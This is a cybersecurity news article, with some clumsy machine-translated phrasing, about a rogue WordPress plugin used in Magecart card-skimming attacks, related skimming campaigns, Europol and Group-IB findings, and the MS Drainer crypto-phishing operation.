Fraudulent WordPress plugin exposes ecommerce sites to credit card theft

WordPress Plugin

Threat hunters have discovered a rogue WordPress plugin capable of creating fake admin users and injecting malicious JavaScript code to steal credit card information.

The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri.

“Like many other malicious or fake WordPress plugins, this one contains some misleading information at the top of the file to give it a veneer of legitimacy,” says security researcher Ben Martin. said. “In this case, comments claim the code is ‘WordPress Cache Addons’.”

Malicious plugins typically find their way into WordPress sites through a compromised administrator or by exploiting security flaws in another plugin already installed on the site.

Once installed, the plugin will replicate itself to the mu plugins (or plugins you need to use) so that it is automatically enabled and hides its presence from the admin panel.

“Since the only way to remove any of the mu plugins is to manually delete the file, the malware does everything it can to prevent this,” Martin explains. “The malware achieves this by deregistering callback functions for hooks that plugins like this normally use.”

The fraudster also comes with an option to create an administrator user account and hide it from the legitimate website administrator to avoid alerts and have access to the target for a longer period of time.

The ultimate goal of the campaign is to inject credit card-stealing malware into the payment pages and exfiltrate the information to an actor-controlled domain.

“Since many WordPress infections occur through compromised users of wp-admin administrators, it only makes sense that they had to work within the limitations of the access levels they have, and installing plugins is certainly one of the most important skills that WordPress admins own,” said Martijn.

The revelation comes weeks after the WordPress security community warned of a phishing campaign that alerts users to an unrelated security flaw and tricks them into installing a plugin under the guise of a patch. The plugin in turn creates an admin user and implements a web shell for persistent remote access.

Sucuri said the threat actors behind the campaign are using the ‘RESERVED” status associated with a CVE identifier, which happens when it is reserved for use by a CVE Numbering Authority (CNA) or security researcher, but the details have yet to be completed.

WordPress plugin

It also comes as the website security company discovers another Magecart campaign that uses the WebSocket communications protocol to manage the skimmer code on online stores. The malware is then activated when you click a fake ‘Complete Order’ button that is placed over the legitimate checkout button.

Europol’s spotlight report on online fraud published this week describes digital skimming as a persistent threat resulting in the theft, resale and misuse of credit card data. “An important evolution in digital skimming is the shift from the use of front-end malware to back-end malware, making it more difficult to detect,” the report said. said.

The EU law enforcement agency said Also, 443 online merchants were notified that their customers’ credit or debit card details had been compromised via skimming attacks.

Group-IB, which also worked with Europol on the cross-border cybercrime counter operation codenamed Digital Skimming Action, said it has detected and identified 23 families of JS sniffers, including ATMZOW, health_check, FirstKiss, FakeGA, AngryBeaver, Inter and R3nin. which were used against companies in 17 different countries in Europe and America.

“A total of 132 JS sniffer families are known to have compromised websites worldwide by the end of 2023,” the Singapore-based company said. added.

That’s not all. Fake ads have been found on Google Search and Twitter for cryptocurrency platforms promoting a cryptocurrency drainer called MS Drainer, which is estimated to have already looted $58.98 million from 63,210 victims through a network of 10,072 phishing websites since March 2023 .

“By targeting specific audiences via Google search terms and the following basis of X, they can select specific targets and launch continuous phishing campaigns at a very low cost,” ScamSniffer said.

#Fraudulent #WordPress #plugin #exposes #ecommerce #sites #credit #card #theft

Notify of
Inline Feedbacks
View all comments
Previous Post
Rust-Based Malware

Rust-based malware targets Indian government agencies

Next Post
LAPSUS$ Teen Members

British LAPSUS$ teenage members convicted of high-profile attacks

Related Posts